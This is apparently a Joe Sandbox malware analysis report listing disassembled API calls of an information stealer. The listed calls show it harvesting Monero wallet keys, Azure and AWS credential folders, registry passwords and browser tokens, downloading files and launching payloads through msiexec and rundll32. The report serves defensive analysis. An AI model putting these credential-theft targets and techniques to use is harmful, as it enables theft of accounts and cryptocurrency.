                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,018ADA90,00000000,?,00B1144C,00000000,?,?), ref: 00AFCA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00AFCA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00AFCA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AFCAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00AFCAD9
                          • StrStrA.SHLWAPI(?,018ADA30,00B10B52), ref: 00AFCAF7
                          • StrStrA.SHLWAPI(00000000,018AD868), ref: 00AFCB1E
                          • StrStrA.SHLWAPI(?,018AE3E8,00000000,?,00B11458,00000000,?,00000000,00000000,?,018A8BB8,00000000,?,00B11454,00000000,?), ref: 00AFCCA2
                          • StrStrA.SHLWAPI(00000000,018AE448), ref: 00AFCCB9
                            • Part of subcall function 00AFC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00AFC871
                            • Part of subcall function 00AFC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00AFC87C
                          • StrStrA.SHLWAPI(?,018AE448,00000000,?,00B1145C,00000000,?,00000000,018A8BD8), ref: 00AFCD5A
                          • StrStrA.SHLWAPI(00000000,018A8A48), ref: 00AFCD71
                            • Part of subcall function 00AFC820: lstrcat.KERNEL32(?,00B10B46), ref: 00AFC943
                            • Part of subcall function 00AFC820: lstrcat.KERNEL32(?,00B10B47), ref: 00AFC957
                            • Part of subcall function 00AFC820: lstrcat.KERNEL32(?,00B10B4E), ref: 00AFC978
                          • lstrlen.KERNEL32(00000000), ref: 00AFCE44
                          • CloseHandle.KERNEL32(00000000), ref: 00AFCE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: e1a2da2e4a9f399e9740608af0bf93b856ecef79096a7270422614b14b371a3a
                          • Instruction ID: cd438207a6eb784ad48a5e831fbf18edd32b340096e98d0f35e06444c44fcc61
                          • Opcode Fuzzy Hash: e1a2da2e4a9f399e9740608af0bf93b856ecef79096a7270422614b14b371a3a
                          • Instruction Fuzzy Hash: AEE1DF71910308ABDB15EBA4DD95FEEBBB8AF14300F408599F106B71D1EF346A4ACB61
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • RegOpenKeyExA.ADVAPI32(00000000,018ABBD0,00000000,00020019,00000000,00B105B6), ref: 00B083A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00B08426
                          • wsprintfA.USER32 ref: 00B08459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00B0847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B0848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B08499
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: d40f2f8603e5b44a4fe8497d18c74f175350e1e8af1c2d63b45c83e8df3c3169
                          • Instruction ID: b167b7e63a3f6a964770c656180754fb6810950f81491e67803d950101171ef4
                          • Opcode Fuzzy Hash: d40f2f8603e5b44a4fe8497d18c74f175350e1e8af1c2d63b45c83e8df3c3169
                          • Instruction Fuzzy Hash: F3811D719102189BDB24DB54CC95FEABBB8FF48700F0086D9E149A6190DF71AF85CFA1
                          APIs
                            • Part of subcall function 00B08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B08E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00B04DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00B04DCD
                            • Part of subcall function 00B04910: wsprintfA.USER32 ref: 00B0492C
                            • Part of subcall function 00B04910: FindFirstFileA.KERNEL32(?,?), ref: 00B04943
                          • lstrcat.KERNEL32(?,00000000), ref: 00B04E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00B04E59
                            • Part of subcall function 00B04910: StrCmpCA.SHLWAPI(?,00B10FDC), ref: 00B04971
                            • Part of subcall function 00B04910: StrCmpCA.SHLWAPI(?,00B10FE0), ref: 00B04987
                            • Part of subcall function 00B04910: FindNextFileA.KERNEL32(000000FF,?), ref: 00B04B7D
                            • Part of subcall function 00B04910: FindClose.KERNEL32(000000FF), ref: 00B04B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00B04EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00B04EE5
                            • Part of subcall function 00B04910: wsprintfA.USER32 ref: 00B049B0
                            • Part of subcall function 00B04910: StrCmpCA.SHLWAPI(?,00B108D2), ref: 00B049C5
                            • Part of subcall function 00B04910: wsprintfA.USER32 ref: 00B049E2
                            • Part of subcall function 00B04910: PathMatchSpecA.SHLWAPI(?,?), ref: 00B04A1E
                            • Part of subcall function 00B04910: lstrcat.KERNEL32(?,018AFC80), ref: 00B04A4A
                            • Part of subcall function 00B04910: lstrcat.KERNEL32(?,00B10FF8), ref: 00B04A5C
                            • Part of subcall function 00B04910: lstrcat.KERNEL32(?,?), ref: 00B04A70
                            • Part of subcall function 00B04910: lstrcat.KERNEL32(?,00B10FFC), ref: 00B04A82
                            • Part of subcall function 00B04910: lstrcat.KERNEL32(?,?), ref: 00B04A96
                            • Part of subcall function 00B04910: CopyFileA.KERNEL32(?,?,00000001), ref: 00B04AAC
                            • Part of subcall function 00B04910: DeleteFileA.KERNEL32(?), ref: 00B04B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: 571eb5efcdd462553d058d8fb7f1433a721eaec5cc375f2685f364ff518c9dae
                          • Instruction ID: 0dc2a6bd7a27bdff939046b13c39aac6e6d5ac067cdcd1d81d25e910b252c865
                          • Opcode Fuzzy Hash: 571eb5efcdd462553d058d8fb7f1433a721eaec5cc375f2685f364ff518c9dae
                          • Instruction Fuzzy Hash: AD4195BAA5030867C750F770DC47FED37B8AB24700F4049D4B28AA61D1EEB597C98B92
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B0906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: 977ce9d36932740b5e164fd1b4ac2aac775d63085e66d025c48d580c860630ba
                          • Instruction ID: 8016809851ec3676bc02ea2ac716fcd224c39c492f0efb9717218d56eb139c1d
                          • Opcode Fuzzy Hash: 977ce9d36932740b5e164fd1b4ac2aac775d63085e66d025c48d580c860630ba
                          • Instruction Fuzzy Hash: 1571CEB5A10308ABDB04DBE8DD89FEEBBB8BB48700F108548F655E7290DB759905CB61
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00B031C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00B0335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00B034EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: 5be7483d867183b9dba93853be4095e7091036ffb852d4772d06e274213dd233
                          • Instruction ID: 9fa2e7be85eaa226c4bac62a6ae09e47510b6bc47859a862c555ee00d756d0a4
                          • Opcode Fuzzy Hash: 5be7483d867183b9dba93853be4095e7091036ffb852d4772d06e274213dd233
                          • Instruction Fuzzy Hash: F312ED719103089ADB05FBA0DD92FDEBBB8AF24300F5085D9E506761D1EF746B4ACB62
                          APIs
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF6280: InternetOpenA.WININET(00B10DFE,00000001,00000000,00000000,00000000), ref: 00AF62E1
                            • Part of subcall function 00AF6280: StrCmpCA.SHLWAPI(?,018AFBE0), ref: 00AF6303
                            • Part of subcall function 00AF6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AF6335
                            • Part of subcall function 00AF6280: HttpOpenRequestA.WININET(00000000,GET,?,018AF500,00000000,00000000,00400100,00000000), ref: 00AF6385
                            • Part of subcall function 00AF6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AF63BF
                            • Part of subcall function 00AF6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AF63D1
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B05318
                          • lstrlen.KERNEL32(00000000), ref: 00B0532F
                            • Part of subcall function 00B08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B08E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00B05364
                          • lstrlen.KERNEL32(00000000), ref: 00B05383
                          • lstrlen.KERNEL32(00000000), ref: 00B053AE
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 27b1d6ab9d7d79810680b6aef0bf566d314c07ff786a4b183468bf9a1d1dbe46
                          • Instruction ID: 93cfe9ad2c223db70a784705ba3ace83237d8a9ff6d11d01dafc560fdcca31b9
                          • Opcode Fuzzy Hash: 27b1d6ab9d7d79810680b6aef0bf566d314c07ff786a4b183468bf9a1d1dbe46
                          • Instruction Fuzzy Hash: 4751FB709102489BCB14EF64CD96FEE7BB9EF14301F508898F506AA5D1EF34AB45CB62
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: dbbaff060f0de59fd1315cbabd59a011a26639c0050baf1e18143398baff8309
                          • Instruction ID: 58ae037bfce5b0ae74362fefb283299965325349d8528e0ef4b674b7c6ff7fc4
                          • Opcode Fuzzy Hash: dbbaff060f0de59fd1315cbabd59a011a26639c0050baf1e18143398baff8309
                          • Instruction Fuzzy Hash: C8C169B5A002199BCB14EF64DC89FDA77B8BB64304F1045D9F50AA72C1DB70EA85CFA1
                          APIs
                            • Part of subcall function 00B08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B08E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00B042EC
                          • lstrcat.KERNEL32(?,018AF3E0), ref: 00B0430B
                          • lstrcat.KERNEL32(?,?), ref: 00B0431F
                          • lstrcat.KERNEL32(?,018AD7F0), ref: 00B04333
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B08D90: GetFileAttributesA.KERNEL32(00000000,?,00AF1B54,?,?,00B1564C,?,?,00B10E1F), ref: 00B08D9F
                            • Part of subcall function 00AF9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00AF9D39
                            • Part of subcall function 00AF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AF99EC
                            • Part of subcall function 00AF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AF9A11
                            • Part of subcall function 00AF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AF9A31
                            • Part of subcall function 00AF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AF148F,00000000), ref: 00AF9A5A
                            • Part of subcall function 00AF99C0: LocalFree.KERNEL32(00AF148F), ref: 00AF9A90
                            • Part of subcall function 00AF99C0: CloseHandle.KERNEL32(000000FF), ref: 00AF9A9A
                            • Part of subcall function 00B093C0: GlobalAlloc.KERNEL32(00000000,00B043DD,00B043DD), ref: 00B093D3
                          • StrStrA.SHLWAPI(?,018AF350), ref: 00B043F3
                          • GlobalFree.KERNEL32(?), ref: 00B04512
                            • Part of subcall function 00AF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AF4EEE,00000000,00000000), ref: 00AF9AEF
                            • Part of subcall function 00AF9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00AF4EEE,00000000,?), ref: 00AF9B01
                            • Part of subcall function 00AF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AF4EEE,00000000,00000000), ref: 00AF9B2A
                            • Part of subcall function 00AF9AC0: LocalFree.KERNEL32(?,?,?,?,00AF4EEE,00000000,?), ref: 00AF9B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 00B044A3
                          • StrCmpCA.SHLWAPI(?,00B108D1), ref: 00B044C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00B044D2
                          • lstrcat.KERNEL32(00000000,?), ref: 00B044E5
                          • lstrcat.KERNEL32(00000000,00B10FB8), ref: 00B044F4
                           Memory Dump Source
                           • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true (associated dump regions and IDA snapshot file as in the first listing above)
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: 67f9890dd4bef2c972ed8a92cc53072a8dc0ddb495a52b7c6f09d08c238d0a17
                          • Instruction ID: fa8e5c68874576f85c0868160b0eed679bb71d4b40204a9eba935b70d47dbb76
                          • Opcode Fuzzy Hash: 67f9890dd4bef2c972ed8a92cc53072a8dc0ddb495a52b7c6f09d08c238d0a17
                          • Instruction Fuzzy Hash: BD7144B6A00208ABDB14FBA4DC85FEE77B9AB48300F0045D8F64597191EB75DB49CFA1
                          APIs
                            • Part of subcall function 00AF12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF12B4
                            • Part of subcall function 00AF12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00AF12BB
                            • Part of subcall function 00AF12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00AF12D7
                            • Part of subcall function 00AF12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00AF12F5
                            • Part of subcall function 00AF12A0: RegCloseKey.ADVAPI32(?), ref: 00AF12FF
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF134F
                          • lstrlen.KERNEL32(?), ref: 00AF135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00AF1377
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B08B60: GetSystemTime.KERNEL32(00B10E1A,018AEBF0,00B105AE,?,?,00AF13F9,?,0000001A,00B10E1A,00000000,?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B08B86
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00AF1465
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AF99EC
                            • Part of subcall function 00AF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AF9A11
                            • Part of subcall function 00AF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AF9A31
                            • Part of subcall function 00AF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AF148F,00000000), ref: 00AF9A5A
                            • Part of subcall function 00AF99C0: LocalFree.KERNEL32(00AF148F), ref: 00AF9A90
                            • Part of subcall function 00AF99C0: CloseHandle.KERNEL32(000000FF), ref: 00AF9A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 00AF14EF
                          Strings
                           Memory Dump Source
                           • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true (associated dump regions and IDA snapshot file as in the first listing above)
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: f7d717b590dc2b2fa2dd7e6340504c8e0ca432290549127938a2dccd713843d9
                          • Instruction ID: ad9cabf4555c5163a99ed35bbaf6debbeae8c7d44d5c922c6c181c1479967bc5
                          • Opcode Fuzzy Hash: f7d717b590dc2b2fa2dd7e6340504c8e0ca432290549127938a2dccd713843d9
                          • Instruction Fuzzy Hash: 3D5121B1D5031997CB15FB60DD92FED77BCAB54300F4045E8B60AA20D1EE705B89CBA6
                          APIs
                            • Part of subcall function 00AF72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00AF733A
                            • Part of subcall function 00AF72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00AF73B1
                            • Part of subcall function 00AF72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00AF740D
                            • Part of subcall function 00AF72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00AF7452
                            • Part of subcall function 00AF72D0: HeapFree.KERNEL32(00000000), ref: 00AF7459
                          • lstrcat.KERNEL32(00000000,00B117FC), ref: 00AF7606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00AF7648
                          • lstrcat.KERNEL32(00000000, : ), ref: 00AF765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00AF768F
                          • lstrcat.KERNEL32(00000000,00B11804), ref: 00AF76A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00AF76D3
                          • lstrcat.KERNEL32(00000000,00B11808), ref: 00AF76ED
                          • task.LIBCPMTD ref: 00AF76FB
                          Strings
                           Memory Dump Source
                           • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true (associated dump regions and IDA snapshot file as in the first listing above)
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                          • String ID: :
                          • API String ID: 2677904052-3653984579
                          • Opcode ID: 17b6753de447f4b4cdf2019a3a0cbf51ea2286610bc5a293e4f9ed9aa9a09146
                          • Instruction ID: b7fb4a1bfba5129443c6b6bc45dbe9e0d38e8a33207230ab4d3ff89a79aae206
                          • Opcode Fuzzy Hash: 17b6753de447f4b4cdf2019a3a0cbf51ea2286610bc5a293e4f9ed9aa9a09146
                          • Instruction Fuzzy Hash: 7D314C71A00209DFCB44EBF8DD96DFE77B8BB44301B144558F202E72A1DA35A946DB61
                          APIs
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AF4839
                            • Part of subcall function 00AF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AF4849
                          • InternetOpenA.WININET(00B10DF7,00000001,00000000,00000000,00000000), ref: 00AF610F
                          • StrCmpCA.SHLWAPI(?,018AFBE0), ref: 00AF6147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00AF618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00AF61B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00AF61DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00AF620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00AF6249
                          • InternetCloseHandle.WININET(?), ref: 00AF6253
                          • InternetCloseHandle.WININET(00000000), ref: 00AF6260
                           Memory Dump Source
                           • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true (associated dump regions and IDA snapshot file as in the first listing above)
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: acfa47b9cf15b0efaa8eac80020cb73298953d92f8c6df1dfe47e30a96176116
                          • Instruction ID: 9eeb897f49c6258203b949d14332194cd60c31afb61797608ace7e815f4199b0
                          • Opcode Fuzzy Hash: acfa47b9cf15b0efaa8eac80020cb73298953d92f8c6df1dfe47e30a96176116
                          • Instruction Fuzzy Hash: BB513FB1A0031CABDB20DF94DC49BEE77B8EB44701F108598B705A72C1DB75AA85CFA5
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00AF733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00AF73B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00AF740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00AF7452
                          • HeapFree.KERNEL32(00000000), ref: 00AF7459
                          • task.LIBCPMTD ref: 00AF7555
                          Strings
                           Memory Dump Source
                           • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true (associated dump regions and IDA snapshot file as in the first listing above)
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuetask
                          • String ID: Password
                          • API String ID: 775622407-3434357891
                          • Opcode ID: abfde678ff1902ed890d3c9b3f3648a4564033cb724e80eaa9903c4f64f124ab
                          • Instruction ID: dbbfebc7d0a6b08aa297cde6630ff530cc84daf29092d9b64524505375f0019a
                          • Opcode Fuzzy Hash: abfde678ff1902ed890d3c9b3f3648a4564033cb724e80eaa9903c4f64f124ab
                          • Instruction Fuzzy Hash: 66611BB590426C9BDB24DB94DD41BEAB7B8BF44300F0081E9F689A6181DB745BC9CFA1
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                          • lstrlen.KERNEL32(00000000), ref: 00AFBC9F
                            • Part of subcall function 00B08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B08E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 00AFBCCD
                          • lstrlen.KERNEL32(00000000), ref: 00AFBDA5
                          • lstrlen.KERNEL32(00000000), ref: 00AFBDB9
                          Strings
                           Memory Dump Source
                           • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true (associated dump regions and IDA snapshot file as in the first listing above)
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 85854048a91a47817482815d657fe67cc50f87edeab87f6e3bc4fdd916f561a5
                          • Instruction ID: 77c2235888b7e95894155bb44bcda8fefbb4e5f14ee774ae297ffca27449d213
                          • Opcode Fuzzy Hash: 85854048a91a47817482815d657fe67cc50f87edeab87f6e3bc4fdd916f561a5
                          • Instruction Fuzzy Hash: A3B10071910308ABDB04FBA4DD96EEE77B8AF54300F404999F506B61D1EF34AA49CB72
                          APIs
                          Strings
                           Memory Dump Source
                           • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true (associated dump regions and IDA snapshot file as in the first listing above)
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: af39321ef50b2be7f2329ba22f7ac36a399cb9a0717abc79306f25bee92429f6
                          • Instruction ID: 2668bd5943b2e824482fc4102b42a53d1905a030ca1942abe77f8058f96b66e5
                          • Opcode Fuzzy Hash: af39321ef50b2be7f2329ba22f7ac36a399cb9a0717abc79306f25bee92429f6
                          • Instruction Fuzzy Hash: 73F05E72A04309EFD3449FE8E94972C7B70FB04703F040199E649C6390DA704F519BE6
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00AF4FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF4FD1
                          • InternetOpenA.WININET(00B10DDF,00000000,00000000,00000000,00000000), ref: 00AF4FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00AF5011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00AF5041
                          • InternetCloseHandle.WININET(?), ref: 00AF50B9
                          • InternetCloseHandle.WININET(?), ref: 00AF50C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: the same fourteen dump regions listed under the first function above
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 3a3b9ee6ad7c4e9b1992eb041d418fb3c7dc28b7a5673b3ba2dd9819af7c8d7c
